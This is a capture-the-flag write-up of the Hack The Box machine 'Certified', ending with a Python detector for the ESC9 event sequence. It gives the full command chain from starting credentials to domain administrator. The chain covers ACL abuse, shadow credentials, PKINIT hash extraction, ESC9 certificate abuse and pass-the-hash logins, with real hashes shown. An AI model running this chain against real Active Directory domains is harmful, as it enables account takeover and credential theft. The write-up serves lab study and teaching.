![[Hack The Box/Certified/IntroImage.png]]

## Summary of Exploitation

Hey all, today I pwned Certified by HackTheBox. Certified was a medium machine that was incredibly well put together, and the 4.8 rating shows it. The attacker starts with low-level user creds that allowed me to download all the LDAP and BloodHound information. Using this information I was able to exploit some user misconfigurations that led me to an account that could enroll in a vulnerable ADCS template, allowing me to obtain my own administrator certificate.

## Recon Phase

As always, I start with my tried and true nmap scan:

`sudo nmap -sC -sV -p- --min-rate 10000 10.129.182.172 -oA nmap-out`

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 13:24 EST
Nmap scan report for 10.129.182.172
Host is up (0.063s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 01:25:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-23T01:26:56+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-01-23T01:26:57+00:00; +7h00m02s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-01-23T01:26:56+00:00; +7h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-01-23T01:26:57+00:00; +7h00m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49726/tcp open  msrpc         Microsoft Windows RPC
49747/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-01-23T01:26:18
|_  start_date: N/A
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.69 seconds
```

So it looks like we have a very standard Windows Domain Controller: no SQL, no web server, nothing really too special. I'll take note of the hostname DC01.certified.htb and add it to my `/etc/hosts` file.

![[etcHostsCert.png]]

This machine was nice enough to provide me with starting credentials, judith.mader / judith09. I'm going to leverage these credentials and download all the LDAP information I can, to get a list of users and their associated groups, using ldapdomaindump.

`ldapdomaindump -u certified.htb\\judith.mader -p judith09 10.129.182.172 -o .`

![[ldapDomainDumpCert.png]]

I'll open up the HTML file for users in my browser and get some situational awareness.

![[usersCert.png]]

Not a whole lot of users here. It looks like the only way I'm going to get a session is through management_svc. I'm going to add these users to my users.txt file.
![[usersTextCert.png]]

Next, I'm going to further leverage Judith's creds by downloading all the BloodHound information using bloodhound-python.

`bloodhound-python -c ALL -u judith.mader -p judith09 -d certified.htb -dc certified.htb -ns 10.129.182.172`

![[bloodCert.png]]

I'll go ahead and fire up BloodHound/neo4j and upload the information.

![[uploadBloodCert.png]]

Now I'll do some digging and see if Judith has any special privileges.

![[WriteOwnerCert.png]]

Here we go! Judith has WriteOwner on the Management group. That group has GenericWrite on management_svc, and management_svc has GenericAll on ca_operator. It's likely ADCS will come into play here. I'll use netexec to confirm that suspicion.

```
nxc ldap 10.129.182.172 -u judith.mader -p 'judith09' -M adcs
```

![[adcsCert.png]]

Suspicion confirmed. I'll have to use ca_operator to search for vulnerable templates so I can potentially obtain a certificate for administrator. First, though, I'm going to see if I can skip the line and Kerberoast management_svc, since BloodHound tells me that management_svc is Kerberoastable.

`impacket-GetUserSPNs -request -dc-ip 10.129.182.172 certified.htb/judith.mader -save -outputfile kerberoast-out`

![[Hack The Box/Certified/kerberoast.png]]

`hashcat -m 13100 -a 0 kerberoast-out /usr/share/wordlists/rockyou.txt`

But, as expected, it doesn't crack.

![[noCracjCert.png]]

## Exploitation Phase

First I'm going to make Judith the owner of the Management group, give her write permissions on it, and add her to the group, all using Impacket tools. Taking ownership comes first:

`impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.182.172`

![[ownerEditCert.png]]

Now I'll give Judith the ability to write members to the group.
`impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.182.172`

![[DaclModCert.png]]

Finally I'll use RPC to add Judith to the Management group.

`net rpc group addmem "MANAGEMENT" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.182.172`

I get nothing back, but no news is good news! Since I now have GenericWrite on management_svc, I have two options:

* I can do a targeted Kerberoast on that account, assuming I can even crack the hash (which I can't).
* I can abuse shadow credentials and get an NT hash using pywhisker, assuming I can obtain a Kerberos ticket with the resulting certificate (which I can).

I'll use the second option. First I'll use pywhisker to check whether management_svc already has shadow credentials. I'm going to run pywhisker in a Python virtual environment:

```
python3 -m venv cert
source cert/bin/activate
```

Now I can clone pywhisker and install the requirements.

```
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip3 install -r requirements.txt
cd pywhisker
```

Now I can check to see if management_svc has shadow creds.

`python3 pywhisker.py --action list -d certified.htb -u judith.mader -p judith09 --dc-ip 10.129.182.172 -t management_svc`

![[NoShadowCredsCert.png]]

Not a problem, I can add some.

`python3 pywhisker.py --action add -d certified.htb -u judith.mader -p judith09 --dc-ip 10.129.182.172 -t management_svc`

![[addpywhiskerCert.png]]

I'm just going to do exactly what the command output says and use PKINITtools to get the TGT. So I'll go ahead and clone it.

```
git clone https://github.com/dirkjanm/PKINITtools
cd PKINITtools
pip3 install -r requirements.txt
```

Now I'll run the command, providing the information from the previous command.
`python3 gettgtpkinit.py -cert-pfx ../9t2Ahj4Z.pfx -pfx-pass vy1ChB2p6Rfv1JxAbT6n certified.htb/management_svc management_svc.ccache -dc-ip 10.129.182.172`

![[KinitCert.png]]

Now all that's left is to extract the NT hash from the ticket using getnthash.py.

```
export KRB5CCNAME=management_svc.ccache
python3 getnthash.py certified.htb/management_svc -key 763a399ddfc5a617c3b785f46acb3eb7aac43f503b3f5bd7578b37ad615b4123
```

After fighting a few times with clock skew (the nmap scan showed the DC about seven hours ahead of my machine, and Kerberos rejects requests from a client more than five minutes out of sync), I got the hash!

![[hashCert.png]]

We can log in and get the user flag.

```
evil-winrm -i 10.129.182.172 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'

*Evil-WinRM* PS C:\Users\management_svc>cat desktop/user.txt
1c153****************************
*Evil-WinRM* PS C:\Users\management_svc>
```

## PrivEsc to Administrator

Alright, now that I can successfully authenticate as management_svc, I need to pivot to ca_operator. Since ADCS is active and I have GenericAll over ca_operator, I can get its hash using certipy shadow.

```
certipy shadow auto -username management_svc@certified.htb -hashes 'a091c1832bcdd4677c28b5a6a1295584' -account ca_operator
```

![[gotCAopCert.png]]

Easy day. We got the hash for ca_operator: b4b86f45c6018f1b664f70805f45d8f2

Now I'm going to check for any vulnerable templates using certipy.

`certipy find -u ca_operator -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target certified.htb -text -stdout -vulnerable`

![[vulnerableTemplate.png]]

Good news and bad news! We have a vulnerable template, but it's ESC9. ESC9 is just a little more complicated, is all: the template omits the SID security extension from the certificates it issues, so the DC maps a certificate to an account by UPN alone, which is what the UPN changes below rely on. We can exploit it by following this article [here](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7).

First, I need to change ca_operator's UPN to Administrator.

`certipy account update -username management_svc@certified.htb -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn Administrator`

![[upnToAdmin.png]]

Now we need to request the vulnerable template as ca_operator.
`certipy req -username ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -ca certified-DC01-CA -template CertifiedAuthentication`

![[vulntemplatereqCert.png]]

Now we can change the UPN back.

`certipy account update -username management_svc@certified.htb -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn ca_operator@certified.htb`

![[ChangeitBackReq.png]]

Last but not least, we can authenticate with the certificate and recover the administrator's NTLM hash.

```
certipy auth -pfx administrator.pfx -domain certified.htb
```

![[boomAdminHashCert.png]]

Now I can Evil-WinRM in as administrator and get the root flag.

`evil-winrm -i 10.129.182.172 -u administrator -H '0d5b49608bbce1751f708748f67e2d34'`

```
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
98e66**************************
```

Thanks for reading everyone, I really enjoyed this machine. It was very straightforward and gave me a good opportunity to practice my remote ACL abuse. Happy Hacking!
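The ESC9 sequence above (ca_operator's UPN rewritten to Administrator, a certificate issued to ca_operator, then the UPN restored) leaves a distinctive trail in the DC's Security log. As an added example that is not part of this writeup, here is a small Python correlator over constructed, simplified records of events 4738 (a user account was changed) and 4887 (Certificate Services issued a certificate); the flat field names, the sample timestamps and the 30-minute window are my own assumptions.

```python
from datetime import datetime, timedelta

# Constructed, simplified records standing in for Security-log events 4738 ("A user
# account was changed") and 4887 ("Certificate Services approved a certificate request
# and issued a certificate"). The flat field names are an assumption, not the event XML.
EVENTS = [
    {"id": 4738, "time": "2025-01-23T01:40:10", "subject": "management_svc",
     "target": "ca_operator", "upn": "Administrator"},
    {"id": 4887, "time": "2025-01-23T01:41:05",
     "requester": "CERTIFIED\\ca_operator", "template": "CertifiedAuthentication"},
    {"id": 4738, "time": "2025-01-23T01:42:30", "subject": "management_svc",
     "target": "ca_operator", "upn": "ca_operator@certified.htb"},
    {"id": 4738, "time": "2025-01-23T02:10:00", "subject": "helpdesk",
     "target": "judith.mader", "upn": "judith.mader@certified.htb"},
]

# Account names whose UPN must never be borrowed by another account.
PRIVILEGED = {"administrator", "krbtgt"}


def ts(event):
    return datetime.fromisoformat(event["time"])


def upn_account(upn):
    """Account-name part of a UPN, lower-cased ('Administrator' -> 'administrator')."""
    return upn.split("@", 1)[0].lower()


def find_esc9_sequences(events, window=timedelta(minutes=30)):
    """Flag a 4738 that rewrites an account's UPN to a privileged name, then look ahead
    inside `window` for a certificate issued to that account and for the UPN being restored."""
    events = sorted(events, key=ts)
    findings = []
    for i, e in enumerate(events):
        if e["id"] != 4738:
            continue
        spoofed = upn_account(e.get("upn", "-"))  # real 4738 shows '-' when UPN is unchanged
        if spoofed == e["target"].lower() or spoofed not in PRIVILEGED:
            continue
        finding = {"target": e["target"], "spoofed_upn": e["upn"], "by": e["subject"],
                   "cert_issued": False, "reverted": False}
        for later in events[i + 1:]:
            if ts(later) - ts(e) > window:
                break
            if later["id"] == 4887 and later["requester"].split("\\")[-1].lower() == e["target"].lower():
                finding["cert_issued"] = True
            if (later["id"] == 4738 and later["target"] == e["target"]
                    and upn_account(later.get("upn", "-")) == e["target"].lower()):
                finding["reverted"] = True
        findings.append(finding)
    return findings
```

A finding with both `cert_issued` and `reverted` set is the full ESC9 pattern; a UPN rewrite alone is still worth an alert, since the revert is only there to cover tracks.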